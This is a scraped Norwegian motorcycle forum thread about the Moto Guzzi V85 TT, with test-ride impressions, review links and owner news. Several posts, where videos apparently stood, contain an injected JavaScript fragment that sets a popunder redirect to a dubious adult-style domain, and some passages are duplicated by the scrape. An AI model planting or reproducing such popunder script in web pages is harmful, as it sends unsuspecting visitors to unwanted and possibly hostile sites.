Moto Guzzi V85 - spennende nykommer i 2019!
- JanK
- Innlegg: 719
- Registrert: 28 mar 2011, 12:52
- Motorsykkelen din: mcimport.it
- Sted: Milano, Italia
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
Måtte dessverre utsette testingen noen dager, men her kommer en lite rapport;
Jeg må si at jeg hadde ett stort smil inni hjelmen hele tiden, for meg er dette den perfekte allround-sykkelen. 208kg tørr føles veldig lett, meget lett-håndterlig selv inne i byen. Utrolig behagelig, mer enn nok effekt, "bare" 80hk men følte aldri at jeg trengte mer, selv ikke på motorveien, topp kvalitetsfølelse, likte godt varsel-lysene som kommer på toppen av instrumentpanelet da man nærmer seg "redline".
Hvis jeg skulle kjøpt meg en ny sykkel som dekte "alle" behov tror jeg V85 hadde stått øverst på ønskelista.
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Jeg må si at jeg hadde ett stort smil inni hjelmen hele tiden, for meg er dette den perfekte allround-sykkelen. 208kg tørr føles veldig lett, meget lett-håndterlig selv inne i byen. Utrolig behagelig, mer enn nok effekt, "bare" 80hk men følte aldri at jeg trengte mer, selv ikke på motorveien, topp kvalitetsfølelse, likte godt varsel-lysene som kommer på toppen av instrumentpanelet da man nærmer seg "redline".
Hvis jeg skulle kjøpt meg en ny sykkel som dekte "alle" behov tror jeg V85 hadde stått øverst på ønskelista.
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
mcimport.it - brukt mc fra italia + deler, utstyr og alt annet mc relatert!
Vinterlagring av motorsykkel i Milano, ta kontakt for informasjon.
Leverandør av SC Project eksos, kontakt meg for priser.
MargaMotoco, custom mc - https://www.instagram.com/margamotoco/
Vinterlagring av motorsykkel i Milano, ta kontakt for informasjon.
Leverandør av SC Project eksos, kontakt meg for priser.
MargaMotoco, custom mc - https://www.instagram.com/margamotoco/
-
OnlineAJ
- Administrator
- Innlegg: 37936
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
Høres veldg lovende ut !JanK skrev: ↑18 mar 2019, 15:22 Utrolig behagelig, mer enn nok effekt, "bare" 80hk men følte aldri at jeg trengte mer, selv ikke på motorveien, topp kvalitetsfølelse, likte godt varsel-lysene som kommer på toppen av instrumentpanelet da man nærmer seg "redline".
Hvis jeg skulle kjøpt meg en ny sykkel som dekte "alle" behov tror jeg V85 hadde stått øverst på ønskelista.
Her noen flere bilder av den ene som så langt befinner seg ute hos en av Moto Guzzis skammelige altfor få forhandlere her i landet.
Ingen muligheter for testkjøring her enda, dessverre.... .
Lett atkomst til luftfilterboksen og batteri under salen.
Ingen høydejustering av skjerm, men vinkelen kan justeres ved å løsne et par umbrakoskruer.
Godt eksospottedesign, smal velformet og ligger tett inntil sykkelen. Her synes jeg Moto Guzzi har gjort en spesielt god jobb.
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
-
OnlineAJ
- Administrator
- Innlegg: 37936
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
Interessant testrapport:
https://www.revzilla.com/common-tread/2 ... 8d0a18050e
Testkjøreren skriver en del om motoren, som de fleste vil være enige i er Moto Guzzis mest framtredende karaktertrekk. At denne har gjennomgått store endringer kan jeg skrive under på etter å gått gjennom et internt dokument hvor den "gamle" 853 kubikkeren sammenlignes med endringer gjort på den nye.
Det som overrasker mest er at den nye motoren kun skal ha snaue 1,8 liter motorolje !
Det synes både jeg og Guzziguru Reimar hos Hadeland MC var lite. Ikke minst sett i lys av at dette er en ren luftkjølt motor uten oljekjøler hvor altså motoroljen har en helt sentral funksjon for å bidra til å holde motortemperaturen i sjakk under alle kjøreforhold.
Jeg tør påstå at denne motoren er ingeniørkunst av ypperste klasse. Ikke minst i forhold til dagens strenge utslippskrav.
En fantastisk konstruksjon for de av oss som fortsatt synes det er ekstra artig med en topp moderne MC med skikkelige kjøleribber på godt synlige sylinderne .
https://www.revzilla.com/common-tread/2 ... 8d0a18050e
Testkjøreren skriver en del om motoren, som de fleste vil være enige i er Moto Guzzis mest framtredende karaktertrekk. At denne har gjennomgått store endringer kan jeg skrive under på etter å gått gjennom et internt dokument hvor den "gamle" 853 kubikkeren sammenlignes med endringer gjort på den nye.
Det som overrasker mest er at den nye motoren kun skal ha snaue 1,8 liter motorolje !
Det synes både jeg og Guzziguru Reimar hos Hadeland MC var lite. Ikke minst sett i lys av at dette er en ren luftkjølt motor uten oljekjøler hvor altså motoroljen har en helt sentral funksjon for å bidra til å holde motortemperaturen i sjakk under alle kjøreforhold.
Jeg tør påstå at denne motoren er ingeniørkunst av ypperste klasse. Ikke minst i forhold til dagens strenge utslippskrav.
En fantastisk konstruksjon for de av oss som fortsatt synes det er ekstra artig med en topp moderne MC med skikkelige kjøleribber på godt synlige sylinderne .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
- JanK
- Innlegg: 719
- Registrert: 28 mar 2011, 12:52
- Motorsykkelen din: mcimport.it
- Sted: Milano, Italia
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
Jeg kan ikke skjønne noe annet enn at det blir en V85TT på deg med det første!
mcimport.it - brukt mc fra italia + deler, utstyr og alt annet mc relatert!
Vinterlagring av motorsykkel i Milano, ta kontakt for informasjon.
Leverandør av SC Project eksos, kontakt meg for priser.
MargaMotoco, custom mc - https://www.instagram.com/margamotoco/
Vinterlagring av motorsykkel i Milano, ta kontakt for informasjon.
Leverandør av SC Project eksos, kontakt meg for priser.
MargaMotoco, custom mc - https://www.instagram.com/margamotoco/
-
OnlineAJ
- Administrator
- Innlegg: 37936
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
Vi får se, vi får se...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
Jeg er også VELDIG svak for denne modellen.
- haakeik
- Innlegg: 717
- Registrert: 17 mar 2016, 08:11
- Motorsykkelen din: 2013 Moto Guzzi Stelvio NTX 1200
- Sted: Asker området
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
Fin sykkel, men jeg er mer interessert i hvilke gale ting dere har gjort i den lokale Yakuza avdelingen
http://vt.co/lifestyle/heres-real-reaso ... y-fingers/
Uansett, det finnes måter å skjule det på
-
OnlineAJ
- Administrator
- Innlegg: 37936
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
haakeik skrev: ↑20 mar 2019, 10:08
Fin sykkel, men jeg er mer interessert i hvilke gale ting dere har gjort i den lokale Yakuza avdelingen
http://vt.co/lifestyle/heres-real-reaso ... y-fingers/
Uansett, det finnes måter å skjule det på
Ja, si det...?
Noen protese etter så mange år som nifingrer blir nok uansett ikke aktuelt...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
-
OnlineAJ
- Administrator
- Innlegg: 37936
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
En av de bedre, detaljerte og godt beskrivende testrapporter av den nye Guzzi'en:
https://ridermagazine.com/2019/04/04/20 ... bDTH9WN238
Venter fortsatt på min tur...
https://ridermagazine.com/2019/04/04/20 ... bDTH9WN238
Venter fortsatt på min tur...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
-
OnlineAJ
- Administrator
- Innlegg: 37936
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
Nok en god testrapport uten mye utenomsnakk:
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
- kvase
- Innlegg: 1064
- Registrert: 29 des 2015, 02:35
- Motorsykkelen din: KTM 1090 ADV-R/Yamaha WR450F
- Sted: Arendal
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
Kjekt omtalt ?
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Syns det vibrerte godt på en del av filmen hans ved stillestående
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Syns det vibrerte godt på en del av filmen hans ved stillestående
Vespa Piago 75cc Panter 50 cc Honda FT 500 cc XT660 Z Tennere KTM 1050 ADV-- i stallen nå KTM 1090 ADV-R
i tillegg en Suzuki DRZ 400
https://www.myrouteapp.com/travelblog/routes/1002610#
Er dyslektiker min verden kan være nesten slik som i artiklen her
http://www.dagbladet.no/2016/03/09/nyhe ... /43421895/
i tillegg en Suzuki DRZ 400
https://www.myrouteapp.com/travelblog/routes/1002610#
Er dyslektiker min verden kan være nesten slik som i artiklen her
http://www.dagbladet.no/2016/03/09/nyhe ... /43421895/
-
OnlineAJ
- Administrator
- Innlegg: 37936
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
På fredag var jeg innom Moto Guzzi forhandler Hadeland MC og tok en prat med nybakt V85 TT "Spesial" eier Tor Linnerud, som iflg. forhandler var den første her i landet som skrev kontrakt på nettopp V85TT "Special". Guzzientusiast i en lang årrekke fra han og fruen gftet seg i 1978 og ble avbildet med en Guzzi hos fotografen i Lillestrøm. Siden da har det vært mange Moto Guzzier i familien Vandevjen/Linnerud.
På fredag var det nyeste tilskuddet leveringsklar og eieren gledet seg stort til hjemturen til Nesøya med den nye sykkelen.
Linnerud vil antakelig være kjent for mange motorsportinteresserte, spesielt innen trialmiljøet.
Her er han avbildet sammen med fruen, Elin Vandevjen, som i en årrekke har vært leder av den norske Moto Guzziklubben. Her med sin svært sjeldne V11 Sport "Rosso Mandello", en av 600 produserte i to serier, den første nummerert fra 1 til 300, mens hennes tilhører den andre serien på 300 unummererte eksemplarer.
En riktig flott sjelden perle av en motorsykkel!
På fredag var det nyeste tilskuddet leveringsklar og eieren gledet seg stort til hjemturen til Nesøya med den nye sykkelen.
Linnerud vil antakelig være kjent for mange motorsportinteresserte, spesielt innen trialmiljøet.
Her er han avbildet sammen med fruen, Elin Vandevjen, som i en årrekke har vært leder av den norske Moto Guzziklubben. Her med sin svært sjeldne V11 Sport "Rosso Mandello", en av 600 produserte i to serier, den første nummerert fra 1 til 300, mens hennes tilhører den andre serien på 300 unummererte eksemplarer.
En riktig flott sjelden perle av en motorsykkel!
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
-
OnlineAJ
- Administrator
- Innlegg: 37936
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
Fikk en ny testtur med Moto Guzzi V85 TT i dag etter en prat med mannen bak Booster Plug, danske Jens Lyck, som var på Norgesbesøk for blant annet å testkjøre en V85 TT med en prototyp av Booster Plug.
Han ga tommelen opp etter testturen og det samme kan jeg gjøre etter turen.
Med denne går V85'en helt klart jevnere og uten rykking i lav hastighet i lavt gir.
Samtidig er gassresponsen merkbart bedre, også i sjettegir.
En skikkelig morosm sykkel å kjøre er blitt enda bedre med Booster Plug, som jeg begynner å tro virkelig gjør en forskjell på enkelte sykler.
Men mr. Lyck, som selv eier en helt maken sykkel til den jeg selv har - KTM 1290 SA S - innrømmet glatt at Booster Plug'en hans ikke utgjorde noen forskjell på akkurat denne modellen... .
Interessant å møte en kar som dette, som utvilsomt har gjort stor suksess med produktet sitt.
Kommer kanskje intervju om saken og mannen i MC-avisa etter hvert...
Han ga tommelen opp etter testturen og det samme kan jeg gjøre etter turen.
Med denne går V85'en helt klart jevnere og uten rykking i lav hastighet i lavt gir.
Samtidig er gassresponsen merkbart bedre, også i sjettegir.
En skikkelig morosm sykkel å kjøre er blitt enda bedre med Booster Plug, som jeg begynner å tro virkelig gjør en forskjell på enkelte sykler.
Men mr. Lyck, som selv eier en helt maken sykkel til den jeg selv har - KTM 1290 SA S - innrømmet glatt at Booster Plug'en hans ikke utgjorde noen forskjell på akkurat denne modellen... .
Interessant å møte en kar som dette, som utvilsomt har gjort stor suksess med produktet sitt.
Kommer kanskje intervju om saken og mannen i MC-avisa etter hvert...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
-
OnlineAJ
- Administrator
- Innlegg: 37936
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Moto Guzzi V85 - spennende nykommer rett rundt hjørnet!
Interessant V85 TT langdistanse testkjøring :) :
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
- FredrikE24
- Innlegg: 4727
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Moto Guzzi V85 - spennende nykommer i 2019!
Handlet boosterplug av han. Til gammel Bosch Motronic vil jeg ikke anbefale det. Da jeg hadde plugga ute på høsten var de ikke bare litt sota, men veldig! Funker sikkert bra på noen sykler. Med dagens EU-regler for utslipp har den nok større virkning uten å overdrive mengden bensin.
Etter utskiftning til helanlegg uten katalysator så satt jeg inn annen chip i motronicen optimert for TwoBrothers header og 95Oktan. Det funker supert!
Etter utskiftning til helanlegg uten katalysator så satt jeg inn annen chip i motronicen optimert for TwoBrothers header og 95Oktan. Det funker supert!